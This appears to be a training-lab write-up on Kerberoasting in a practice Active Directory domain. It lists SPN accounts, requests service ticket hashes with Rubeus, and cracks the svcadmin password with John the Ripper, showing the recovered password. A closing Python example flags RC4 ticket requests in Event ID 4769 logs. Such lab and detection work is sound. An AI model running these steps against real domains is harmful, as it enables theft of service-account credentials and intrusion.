# Learning Objective - 14

We list the accounts in AD that have a service principal name (SPN) set.

```
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName


DistinguishedName    : CN=krbtgt,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled              : False
GivenName            :
Name                 : krbtgt
ObjectClass          : user
ObjectGUID           : 956ae091-be8d-49da-966b-0daa8d291bb2
SamAccountName       : krbtgt
ServicePrincipalName : {kadmin/changepw}
SID                  : S-1-5-21-719815819-3726368948-3917688648-502
Surname              :
UserPrincipalName    :

DistinguishedName    : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled              : True
GivenName            : web
Name                 : web svc
ObjectClass          : user
ObjectGUID           : b7ab147c-f929-4ad2-82c9-7e1b656492fe
SamAccountName       : websvc
ServicePrincipalName : {SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL, SNMP/ufc-adminsrv}
SID                  : S-1-5-21-719815819-3726368948-3917688648-1114
Surname              : svc
UserPrincipalName    : websvc

DistinguishedName    : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Enabled              : True
GivenName            : svc
Name                 : svc admin
ObjectClass          : user
ObjectGUID           : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName       : svcadmin
ServicePrincipalName : {MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433,
                       MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local}
SID                  : S-1-5-21-719815819-3726368948-3917688648-1118
Surname              : admin
UserPrincipalName    : svcadmin



PS C:\AD\Tools\ADModule-master\ActiveDirectory>
```

We obtain the service ticket hashes.

```
PS C:\AD\Tools> .\Rubeus.exe kerberoast

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : dollarcorp.moneycorp.local
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 2


[*] SamAccountName         : websvc
[*] DistinguishedName      : CN=web svc,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : SNMP/ufc-adminsrv.dollarcorp.moneycorp.LOCAL
[*] PwdLastSet             : 11/14/2022 4:42:13 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : [hash omitted]


[*] SamAccountName         : svcadmin
[*] DistinguishedName      : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
[*] ServicePrincipalName   : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local:1433
[*] PwdLastSet             : 11/14/2022 9:06:37 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : [hash omitted]
```

Or alternatively:

{% code overflow="wrap" %}

```
PS C:\AD\Tools> .\Rubeus.exe kerberoast /user:svcadmin /simple /rc4opsec /outfile:hash.txt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else
[*] Target User            : svcadmin
[*] Target Domain          : dollarcorp.moneycorp.local
[+] Ticket successfully imported!
[*] Searching for accounts that only support RC4_HMAC, no AES
[*] Searching path 'LDAP://dcorp-dc.dollarcorp.moneycorp.local/DC=dollarcorp,DC=moneycorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(samAccountName=svcadmin)(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!msds-supportedencryptiontypes:1.2.840.113556.1.4.804:=24))'

[*] Total kerberoastable users : 1

[*] Hash written to C:\AD\Tools\hash.txt

[*] Roasted hashes written to : C:\AD\Tools\hash.txt
```

{% endcode %}

DON'T FORGET to open the hash.txt file and remove the SQL service port (the `:1433` in the SPN) before cracking.

```
C:\AD\Tools\john-1.9.0-jumbo-1-win64\run>john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*ThisisBlasphemyThisisMadness!! (?)
1g 0:00:00:00 DONE (2024-03-01 05:02) 13.15g/s 26947p/s 26947c/s 26947C/s energy..mollie
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```
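
On the detection side, the ticket requests shown above leave Event ID 4769 records on the domain controller with ticket encryption type `0x17` (RC4_HMAC, the `23` in `$krb5tgs$23$`). The following is an added example, not part of the original notes: it groups such requests by requester over constructed sample events; the requester names `student1` and `alice` and the `min_services` threshold are assumptions.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, as in the $krb5tgs$23$ hashes in the Rubeus output

# Constructed sample records using Event ID 4769 field names.
# "student1" and "alice" are made-up requesters; the service names come from the page.
EVENTS = [
    dict(EventID=4769, TargetUserName="student1@DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="websvc", TicketEncryptionType="0x17", Status="0x0"),
    dict(EventID=4769, TargetUserName="student1@DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="svcadmin", TicketEncryptionType="0x17", Status="0x0"),
    dict(EventID=4769, TargetUserName="alice@DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="websvc", TicketEncryptionType="0x17", Status="0x0"),
    dict(EventID=4769, TargetUserName="alice@DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="DCORP-MGMT$", TicketEncryptionType="0x12", Status="0x0"),
    dict(EventID=4769, TargetUserName="alice@DOLLARCORP.MONEYCORP.LOCAL",
         ServiceName="svcadmin", TicketEncryptionType="0x17", Status="0x20"),
]


def rc4_service_ticket_requests(events):
    """Map requester -> set of user-account services it got RC4 tickets for."""
    hits = defaultdict(set)
    for ev in events:
        # Only successful service ticket requests are of interest.
        if ev.get("EventID") != 4769 or ev.get("Status") != "0x0":
            continue
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        service = ev["ServiceName"]
        # Skip machine accounts (trailing $) and krbtgt: their keys are random,
        # so their tickets are not practical to crack offline.
        if service.endswith("$") or service.lower() == "krbtgt":
            continue
        requester = ev["TargetUserName"].split("@")[0].lower()
        hits[requester].add(service.lower())
    return hits


def kerberoast_suspects(events, min_services=2):
    """Requesters with RC4 tickets for at least min_services distinct services."""
    grouped = rc4_service_ticket_requests(events)
    return {user: sorted(svcs) for user, svcs in grouped.items()
            if len(svcs) >= min_services}


if __name__ == "__main__":
    for user, services in kerberoast_suspects(EVENTS).items():
        print(f"{user}: RC4 service tickets for {', '.join(services)}")
```

A request aimed at a single account, like the `/user:svcadmin` run above, only shows up with `min_services=1`, so a count threshold is best paired with a watch list of privileged service accounts.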

